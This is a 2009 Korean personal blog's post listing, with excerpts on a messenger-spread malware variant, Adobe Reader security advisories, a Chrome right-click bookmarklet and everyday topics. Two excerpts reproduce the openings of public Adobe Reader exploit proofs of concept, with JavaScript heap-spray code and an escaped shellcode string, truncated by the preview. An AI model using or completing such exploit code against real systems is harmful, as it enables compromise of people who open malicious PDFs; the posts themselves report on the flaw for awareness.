본문 바로가기
네이트온 변종 발생 최근 네이트온 쪽지로 전파되는 악성코드의 변종이 발생하고 있다. 파일이 실행되면, 4명의 여자의 사진을 보여주며 악성파일을 설치한다. 2009. 5. 11.
[AdobeReader]Adobe Reader 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit GetAnnots() 취약점과 같이 발표 된 customDictionaryOpen()의 POC //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux //############## var memory; function New_Script() { var nop = unescape("%u9090%u9090"); var shellcode = unescape("%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b %u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%.. 2009. 4. 30.
[AdobeReader]Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit 몇일 전 취약점이 공개되었던 AdobeReader에 대한 POC가 공개되었다. 이제 또 한차례 폭풍이 불어오나? ㅋ //############## //Exploit made by Arr1val //Proved in adobe 9.1 and adobe 8.1.4 on linux // //Steps: //- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted) //- attach the following script to the OpenAction of the pdf. //############## var memory; function New_Scri.. 2009. 4. 30.
[AdobeReader]Adobe Reader (getAnnots() 등)취약점으로 인한 피해 주의 □ 개요 o Adobe Reader에서 getAnnots() / customDictionaryOpen() 처리 시 발생하는 메모리 손상 에러로 원격코드 실행이 가능한 신규 취약점이 발표되어 사용자의 주의를 요함[1, 2, 3, 4] o Adobe Reader 사용자는 메일/메신저로 전송된 출처가 불분명한 PDF 파일을 열람하지 않도록 주의하여야 함 □ 영향 받는 시스템 o Adobe Reader / Acrobat 9.1 이하 버전 o Adobe Reader / Acroba 8.1.4 이하 버전 o Adobe Reader / Acroba 7.1.1 이하 버전 ※ 모든 플랫폼(윈도우, 매킨토시, Unix/Linux) 상의 모든 제품 버전에 해당함 □ 설명 o 악의적으로 작성된 PDF 문서를 열어볼 경우 피해.. 2009. 4. 29.
[Google Chrome] 구글 크롬 마우스 우측버튼 해제하기!! 크롬을 사용하지 않으려고 했으나 ㅋㅋ 역시 속도면에서 IE6을 능가하기 때문에 ㅠㅠ 어쩔수 없이 크롬님을 숭배하기로 했다 ㅋ 그러나 이런 젝일~ 마우스우측버튼이 안되네? 그래서 열심히 인터넷을 찾던 중 방법을 알게 되었다. 우선 이 파일을 다운로드하여 설치한다 1. 구글 크롬의 북마크의 추가 페이지 생성 2. 생성된 북마크의 URL 란에 다음의 스크립트를 복사 해서 넣는다. javascript:function r(d){d.oncontextmenu=null;d.onselectstart=null;d.ondragstart=null;d.onkeydown=null;d.onmousedown=null; d.body.oncontextmenu=null;d.body.onselectstart=null;d.body.ondra.. 2009. 4. 29.
안철수연구소, 차세대 V3 통합보안 신제품 발표 안철수연구소는 V3 IS 8.0을 공개했다. 관련기사 : http://www.newswire.co.kr/?job=news&no=401968 현재 V3 365클리릭 사용자들도 자동 전환이 될지는 의문이다. 루트킷 진단 기능 및 향상된 자기 보호 다음그림은 쿨켓님의 블로그에서 가져온 그림입니다. 쿨켓님 블로그 : http://xcoolcat7.tistory.com/478 2009. 4. 28.
구글 로고(Google Logo), "사무엘 모스의 생일" 기념 오늘 아침에 구글을 켜는 순간 이상한 문구가 보였다 ㅋ 난 한글이 깨진줄 알았다 ㅡ.ㅡ;; 마우스를 갖다 대니 "사무엘 모스의 생일" 이란다 ㅋㅋㅋ 근데 사무엘모스가 누구지? 2009. 4. 27.
어머니 가게 "에드로컬" 등록완료!! ㅋㅋㅋ 에드로컬을 이용하여 어머니 가게 홍보문구를 완료 하였다. 이걸 보고 얼마나 사람들이 찾아올지는 모르겠지만, 그래도 무료!!! 꽁자로 해주는데 사양할 필요는 없지 ㅎㅎ 2009. 4. 22.